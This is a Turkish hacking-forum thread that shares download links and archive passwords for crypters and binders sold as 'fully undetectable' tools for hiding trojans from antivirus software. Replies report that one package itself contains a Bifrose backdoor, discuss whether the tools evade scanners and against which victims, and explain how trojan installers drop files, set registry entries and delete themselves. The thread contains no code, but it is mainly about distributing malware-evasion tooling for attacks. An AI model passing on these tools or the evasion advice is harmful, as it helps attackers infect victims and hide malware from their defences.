folder Tahribat.com Forumları
linefolder Virüs - Trojan - Keylogger - BotNet
linefolder Trojanleri Avlerden Kaçırmak İçin Araçlar

Trojanleri Avlerden Kaçırmak İçin Araçlar

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Chip
    Chip's avatar
    Erkek

Image
    and yes, it's FUD (Fully undetectable as of release date! so get it while it's HOT!)
    Image

Download: http://rapidshare.com/files/97866588/xCrypt.v1.3pb.rar.html

K-Bind V3 New FUD EnJoY... :D

Image
    http://rapidshare.com/files/82372951/K-Bind_V3_New.rar

Password :__UsMaN_

CİA World Binder

Image

http://w15.easy-share.com/12137721.html

Poke Crypter

Image 

http://rapidshare.com/files/82372875/pOke_Crypter.rar

NOT:Paylaştığım programlarda keylogger veya trojan olabilir çünkü alıntıdır yabancı forumdan verdim ona göre tedbirinizi alın size tavsiyem ya cafeden yapın yada sanal makinada size tavsiyem kendi bilgisayarınızda kurup bu programları kullanmamanız sonuçta size adamalar bedavadan UD programları yapıcak hali yok.Benden söylemesi... :)

2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    xylgn_
    xylgn_'s avatar
    Homo
    bunlar binder olduğu için virus tarayıcıların alert vermesi doğaldır.
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ozoglan
    ozoglan's avatar
    Erkek
    CİA World Binderı indirirken kaspersky cıyak cıyak böğürdü.işallah calışır.

paramparça aşklar ve köpekler..
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    livane
    livane's avatar
    Erkek
    bu sitenin en çok bu yönünü seviyorum,başka yerlerde virüsleri nasıl engellersin diye konu açılıyo burda nasıl antivirüsten kaçırırsın diye :)
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    karani
    karani's avatar
    Erkek

Scanned file:   CIAWorld_Binder__Non_Public_.rar - Infected

CIAWorld_Binder__Non_Public_.rar/CIAWorld Binder [Non Public]/Binder.exe - infected by Constructor.Win32.Binder.aj
    CIAWorld_Binder__Non_Public_.rar/CIAWorld Binder [Non Public]/Comdlg32.ocx - OK
    CIAWorld_Binder__Non_Public_.rar/CIAWorld Binder [Non Public]/Help.txt - OK
    CIAWorld_Binder__Non_Public_.rar/CIAWorld Binder [Non Public]/stub.dll - infected by Backdoor.Win32.Bifrose.bzy
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    n1gh7m4r3
    n1gh7m4r3's avatar
    Erkek

arkadaşlar bu tür programlar "genelde" trojenleri taramadan kaçırıyor,

yani birisi sağ tıklayıp trojeni taratınca uyarı vermiyor, trojeni açınca uyarı veriyor :D fakat kurbanın hangi antivirüsü kullandığını biliyosanız işe yarar ;)

sağol paylaşım için..

7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    SyspioniC
    SyspioniC's avatar
    Erkek

burda 34 binder varmış

Download = http://rapidshare.com/files/39449328/Binders__by_TuRK_HaRD.rar.html

rar şifresi = turk_hard

alıntıdır. aldığım yerdeki yorumları okumanızı tavsite ediyorum:

http://216.239.59.104/search?q=cache:0uoq_juMkvcJ:%68%61%63%6B%68%65%6C%6C.com/archive/index.php/t-279506.html+binder+nedir&hl=tr&ct=clnk&cd=7&gl=tr&client=firefox-a

(reklam olmasın diye site adını kodladım) 

"Derviş Yunus bu sözü eğri büğrü söyleme, Seni sorguya çeker bir Molla Kasım gelir."
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    TurkBlade
    TurkBlade's avatar
    Erkek
    Bu binder zamaninda ben cok kulandim ama antilere yakalanma konusunda serverler gine yakalaniyor hic birsey degismiyor sizbirdeneyin  isterseniz ama sanmiyorum yakalamasin ozaman herkezbir binder yaazar virusleri birseylerle birlestirir yakalanmaz yapardi :) Saygilar

Allah Sizi Korusun .
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Microsoft
    Microsoft's avatar
    Erkek

Bende  denedım cafede bunu  gecenlerde ama  pek faydalı olmadı...Avler ötüyo....

Hero
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Funky_Punky
    Funky_Punky's avatar
    Banlanmış Üye
    Erkek

İşi bilen birisi kesin bir cevap verse şuna ya. :/

Bence çalışmaz ama...

Yazdığım konulara genelde geri dönemiyorum, takip etmemi istediğiniz bir durum olursa lütfen PM atınız.
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    renegadealien
    renegadealien's avatar
    Üstün Hizmet Madalyası Savaş Madalyası Başarı Madalyası Üstün Hizmet Madalyası Developer Madalyası
    Erkek

Aslında bu tarz araçlar tam olarak işe yaramaz neden...

Şimdi trojan keylogger vs tarzı exeler 2 çeşit...

Bunlardan birincisi, senin trojanın konsoluna yada clientine senin tarafından yaptırılmış olan Server.exe dediğimiz bölümü...

Bu bölüm aslında direk olarak zararlı değildir... Server.exeyi bi tarz setup dosyası olarak düşünün...

Server.exeyi tıkladığın zaman, server.exe trojanın kullanacağı exeyi C:\Windows\System32 nin içine cıkartır (Bu C:\Windows da olabilir örnek olarak söylüyorum...)

Trojanın calışması için kullanacağı parametreleri registrye yerleştirir. eğer kullanacağı ini dosyas ı ve/veya dll dosyalarıda varsa bunalrı gerekli yere yerleştirir...

Zaten birden cok trojan konsolunda melt denilen özellik vardır, eğer onu işaretlerseniz, server.exe sisteme trojanı kurduktan sonra kendini siler ve ortadan kaybolur...

Antivirüsler ise 2 şekilde görür bu dosyaları, birincisi server.exenin içine bakıp bu dosyanın içinde a trojanının kodları var diyerek öter yada

Serverı kurtuktan sonra ortaya cıkan System.exe (buda hali bi isimdir) ye bakıp bu dosya a trojanıdır diyerek öter ve siler...

Undedect toolları ise, server.exe olarak bahsettiğimiz trojanın setup dosyasını verdiğiniz için sadece onu undedect yapar, fakat, o trojanı karışıdaki bilgisayara götürüp 2 kere tıkladığınızda, eğer antivirüs var ise, ortaa cıkan exeyi fark edip hem serverı siler hemde o ortaya cıkan dosyayı siler...

Kaldıki, genellikle undeceterlar piyasaya cıktıktan bi süre sonra, antivirüs firmalarınında eline ulaşacağı için, bu firmalarda exenin karakteristiğini inceleyerek nası bi şekilde exeyi undedect yaptığını öğrenirler. bu saatten sonra ise, siz windowsun notepa.exe sini undedect yaparsanız, antivirüsler gene bağırmaya başlayacaktır içinde virus var die :)

ayrıntılı bildi oldu ama :)

10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Kendi özlü sözümdür, kaynak belirterek kullanınız.
Toplam Hit: 6600 Toplam Mesaj: 14